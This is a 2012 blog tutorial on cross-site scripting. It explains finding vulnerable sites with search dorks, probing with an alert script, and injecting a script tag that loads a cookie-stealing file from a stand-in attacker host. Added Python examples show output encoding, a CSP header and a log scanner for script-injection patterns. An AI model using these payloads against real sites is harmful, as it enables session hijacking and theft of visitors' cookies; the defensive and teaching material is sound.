
Sunday, June 24, 2012

Cross Site Scripting (XSS) Complete Tutorial for Beginners




What is XSS?
XSS stands for Cross Site Scripting. Don't confuse it with CSS (Cascading Style Sheets). It is one of the top web application vulnerabilities. It allows an attacker to insert client-side scripts (especially JavaScript) into pages that the web application serves to its users. Using this vulnerability an attacker can inject malicious code, which leads to malware attacks, phishing and session hijacking.

XSS Vulnerability and Injection:

Step 1: Finding Vulnerable Website
As usual, an attacker will search Google using a Google dork. For example, he will search for "search?q=" or "search.php?q=". This returns plenty of websites. There are plenty of Google dorks; hackers find their own dork and search. If you have bad luck, one of those sites will be yours.

Step 2: Testing the Vulnerability
In order to test for the vulnerability, we need to find a POST or GET parameter. Confused? These are just input fields whose values are sent to the server, for example a search query, username or password.
There are two ways to test the vulnerability:

Method 1: Injection in a form box (especially a search box)
An attacker can enter the malicious script inside the search box and click the search button. If the site echoes the input back into the page without encoding it, the malicious script runs inside that website.


Method 2: Injecting in the URL
In this method there may not be any form box. The URL parameters are used instead.
For Example:

http://vulnerablewebsite/search?q=malicious_script_goes_here
For testing purposes, insert
<script>alert('hi');</script>
in the input fields.

For example:
Using method 1, you can enter the code in the search box and click the search button,
or
using method 2, you can enter the code in the URL like this:
http://vulnerablewebsite/search?q=<script>alert('hi');</script>

If a popup box shows the "hi" message, then the site is vulnerable to XSS.


Step 3: Injecting Malicious Scripts
After finding a vulnerable site, an attacker will inject malicious scripts. As said before, this may lead to cookie theft and malware attacks.

Let us assume an attacker hosts a cookie-stealing script on his own website. For instance, his malicious script URL is

http://attackerSite/malicious.js
He can now inject the malicious script inside the vulnerable site like this:
<script src=http://attackerSite/malicious.js></script>
When visitors load the page, the malicious script starts to run and steals their cookies.
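Steps 2 and 3 both rely on the same server-side mistake: the search page copies the q parameter into the HTML unchanged. The following added example (written for this page, not code from the original post) models that search page twice, once vulnerable and once hardened with HTML output encoding, and adds a Content-Security-Policy header as a second line of defence against the external-script injection shown above. The function names, the attribute-context helper and the response headers are assumptions for illustration.

```python
import html

# Added example, not code from the original post. Models the search page the
# post describes: the vulnerable version echoes the q parameter into the HTML
# unchanged, the hardened version HTML-encodes it first.


def render_results_vulnerable(query: str) -> str:
    """Reflects the search term into the page as raw markup (the bug in this post)."""
    return f"<html><body><h1>Results for: {query}</h1></body></html>"


def render_results_safe(query: str) -> str:
    """Encodes <, >, &, double and single quotes so the browser shows the term
    as text instead of parsing it as markup."""
    return f"<html><body><h1>Results for: {html.escape(query, quote=True)}</h1></body></html>"


def render_prefill_safe(query: str) -> str:
    """Attribute context (hypothetical prefilled search box): quote=True also
    encodes quotes, so the value cannot close the attribute and add another
    one such as an event handler."""
    return f'<input type="text" name="q" value="{html.escape(query, quote=True)}">'


def build_response(query: str, hardened: bool = True):
    """Returns (headers, body). The hardened variant adds a Content-Security-Policy
    so that even a missed encoding cannot load a script from another origin,
    which is what the <script src=http://attackerSite/...> injection needs."""
    headers = {"Content-Type": "text/html; charset=utf-8"}
    if hardened:
        headers["Content-Security-Policy"] = "default-src 'self'; script-src 'self'"
        return headers, render_results_safe(query)
    return headers, render_results_vulnerable(query)


def contains_script_tag(page: str) -> bool:
    """Crude check: does the rendered page contain a real <script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    probe = "<script>alert('hi');</script>"                               # Step 2 test payload
    injected = "<script src=http://attackerSite/malicious.js></script>"  # Step 3 payload
    for payload in (probe, injected):
        print("vulnerable page executes it:", contains_script_tag(render_results_vulnerable(payload)))
        print("hardened page executes it:  ", contains_script_tag(render_results_safe(payload)))
```

The encoding must match the context the value lands in: html.escape is right for text and quoted attribute values, but a value placed inside a script block or a URL needs a different encoder. The CSP header does not replace encoding; it limits the damage when encoding is missed.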

Types of XSS Based on persisting capability:

There are two types of XSS based on persisting capability, namely Persistent and Non-Persistent.

Persistent XSS:
This is the riskier XSS vulnerability: the data provided is stored on the server, so the malicious script injection is permanently stored in the web application. It is shown to other users whenever they visit the site.
If the attacker injects malware, then regular users of that website also get infected.

For example:
Some sites store the search query in order to track user interests. This results in permanent storage of the XSS payload.

Non-Persistent XSS:
Also referred to as Reflected XSS. In this case the storage of the malicious script is temporary (meaning it won't be shown to other users). The attacker may trick users into visiting the URL with the injection. As they are regular users of that site, they will trust the link. It leads to stealing cookies.

For example:
When you search on some site, it returns the results along with your search string. This causes the malicious code to run temporarily, in that one response only.
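To make the difference between the two types concrete, here is an added example (constructed for this page, not code from the original post) of a toy site that does both things the section describes: it echoes the visitor's search term (the reflected case) and keeps a "recent searches" list on the server that every later visitor sees (the persistent case). The SearchSite class and its methods are assumptions for illustration; the payload is the one from Step 3.

```python
import html

# Added example, not code from the original post. A toy site (constructed for
# this example) that echoes the visitor's search term (reflected XSS) and keeps
# a shared "recent searches" list on the server (persistent XSS).


class SearchSite:
    def __init__(self, encode_output: bool):
        self.encode_output = encode_output
        self.recent = []          # server-side storage shared by all visitors

    def _out(self, text: str) -> str:
        """Output encoding applied at render time when the site is hardened."""
        return html.escape(text, quote=True) if self.encode_output else text

    def search(self, visitor: str, query: str) -> str:
        """Stores the term (persistent part) and echoes it back (reflected part)."""
        self.recent.append(query)
        return self.render_home(visitor, echo=query)

    def render_home(self, visitor: str, echo=None) -> str:
        """Page every visitor gets; the recent-searches list comes from storage."""
        parts = [f"<p>Hello {self._out(visitor)}</p>"]
        if echo is not None:
            parts.append(f"<p>Results for: {self._out(echo)}</p>")
        items = "".join(f"<li>{self._out(q)}</li>" for q in self.recent[-5:])
        parts.append(f"<p>Recent searches:</p><ul>{items}</ul>")
        return "\n".join(parts)


def count_script_tags(page: str) -> int:
    """How many real <script tags reach the browser in a rendered page."""
    return page.lower().count("<script")


def demo() -> dict:
    payload = "<script src=http://attackerSite/malicious.js></script>"   # from Step 3

    vulnerable = SearchSite(encode_output=False)
    attacker_view = vulnerable.search("attacker", payload)   # reflected once, stored once
    victim_view = vulnerable.render_home("victim")          # victim typed nothing at all

    hardened = SearchSite(encode_output=True)
    hardened.search("attacker", payload)
    hardened_victim_view = hardened.render_home("victim")

    return {
        "attacker_response": count_script_tags(attacker_view),          # 2: echo + stored list
        "victim_response_vulnerable": count_script_tags(victim_view),  # 1: stored list only
        "victim_response_hardened": count_script_tags(hardened_victim_view),  # 0
    }


if __name__ == "__main__":
    for label, count in demo().items():
        print(f"{label}: {count} script tag(s)")
```

The point the numbers make: with reflected XSS the attacker has to get each victim to open a crafted link, while with persistent XSS the victim only has to visit the site. Encoding at render time neutralises both, and it also covers data that was stored before the fix was deployed, which is why encoding belongs at the output rather than only at the input.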

What can an attacker do with this Vulnerability?

  • Stealing the identity and confidential data (credit card details).
  • Bypassing restrictions in websites.
  • Session hijacking (stealing the session).
  • Malware attacks.
  • Website defacement.
  • Denial of Service (DoS) attacks.
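The probes from Step 2 and the payload from Step 3 leave traces in the web server's access log, because the injected value travels in the q parameter. The following added example (written for this page, not code from the original post) scans constructed access-log lines, URL-decodes each parameter and flags values that carry script markup. The log lines, addresses and hostnames are constructed placeholders, and the indicator list is a starting point, not a complete signature set.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines for this example (not real traffic);
# addresses and hostnames are placeholders. Lines 2 and 3 carry the Step 2
# probe and the Step 3 payload, percent-encoded as a browser would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jun/2012:10:01:02 +0000] "GET /search?q=shoes HTTP/1.1" 200 512
203.0.113.7 - - [24/Jun/2012:10:01:09 +0000] "GET /search?q=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E HTTP/1.1" 200 640
203.0.113.7 - - [24/Jun/2012:10:01:15 +0000] "GET /search?q=%3Cscript+src%3Dhttp%3A%2F%2FattackerSite%2Fmalicious.js%3E%3C%2Fscript%3E HTTP/1.1" 200 640
203.0.113.9 - - [24/Jun/2012:10:02:00 +0000] "GET /search?q=script+writing+tips HTTP/1.1" 200 512
"""

# Common-log-format fields we need: client address, timestamp, request target.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of HTML/script injection in a *decoded* parameter value. Matching
# the decoded value matters: the probe arrives percent-encoded in the URL, so a
# rule that looks for a literal "<script" in the raw log line would miss it.
INDICATORS = [
    ("script_tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
]


def decoded_params(target: str):
    """(name, value) pairs with percent-encoding and '+' already decoded."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def scan_line(line: str):
    """Return one finding per suspicious parameter on the line, or [] if clean."""
    m = LINE_RE.match(line)
    if not m:
        return []
    findings = []
    for name, value in decoded_params(m.group("target")):
        hits = [label for label, pattern in INDICATORS if pattern.search(value)]
        if hits:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "param": name, "value": value, "indicators": hits})
    return findings


def scan_log(text: str):
    """Scan a whole log text; the word 'script' alone in a search is not flagged."""
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['ip']} param={finding['param']} "
              f"indicators={finding['indicators']} value={finding['value']!r}")
```

A finding shows that someone tried, not that the site is vulnerable; pair it with the response status and, ideally, a check of whether the page reflects the parameter. POST bodies are not in the access log, so form-box injections (Method 1) need application-level logging to be seen the same way.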
Disclaimer: This article is for educational purposes only. It is written so that pentesters/ethical hackers understand this web application vulnerability. It will also educate webmasters so that they can protect themselves.


Backlink- http://www.breakthesecurity.com
source: http://www.defencehacker.in
